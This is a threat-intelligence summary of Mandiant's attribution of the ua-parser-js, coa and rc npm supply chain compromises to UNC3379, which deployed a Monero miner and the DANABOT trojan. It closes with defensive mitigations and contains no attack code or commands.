Full Report
Mandiant has attributed supply chain attacks which compromised ua-parser-js , coa, and rc to UNC3379. The malicious packages would download and execute both a Monero cryptocurrency miner, and the DANABOT banking trojan, depending on the OS.
Analysis Summary
# Threat Actor: UNC3379
## Attribution & Identity
* **Identified/Attributed Threat Actor:** UNC3379
* **Known Aliases/Associated Groups:** None explicitly mentioned in the context, attributed by Mandiant.
## Activity Summary
Mandiant attributed a recent series of supply chain attacks targeting the Node.js/npm ecosystem to UNC3379. This campaign involved compromising legitimate, widely used packages such as `ua-parser-js`, `coa`, and `rc`. The impact observed was resource hijacking following the successful supply chain compromise.
## Tactics, Techniques & Procedures
* **Observed Techniques:**
* Supply Chain Compromise (specifically targeting widely used public repositories/packages).
## Targeting
* **Sectors:** Not explicitly detailed, but targeting infrastructure supporting software development (npm ecosystem).
* **Geography:** Not specified in the provided context.
* **Victims:** Packages compromised include `ua-parser-js`, `coa`, and `rc`.
## Tools & Infrastructure
* **Malware Families Used:**
* Monero Cryptocurrency Miner
* DANABOT banking trojan
* **Infrastructure:** Not specified in the provided context.
## Implications
UNC3379 is leveraging the software supply chain, a high-impact vector, to deploy dual-purpose malicious payloads—financial theft (banking trojan) and illicit monetization (cryptocurrency mining)—based on the victim's operating system.
## Mitigations
* Scrutinize dependencies pulled from public repositories, especially high-use, community-maintained packages.
* Implement strict software composition analysis (SCA) to detect suspicious changes or behavior in third-party libraries.
* Monitor endpoint activity for signs of cryptocurrency mining or new banking malware execution originating from legitimate application processes.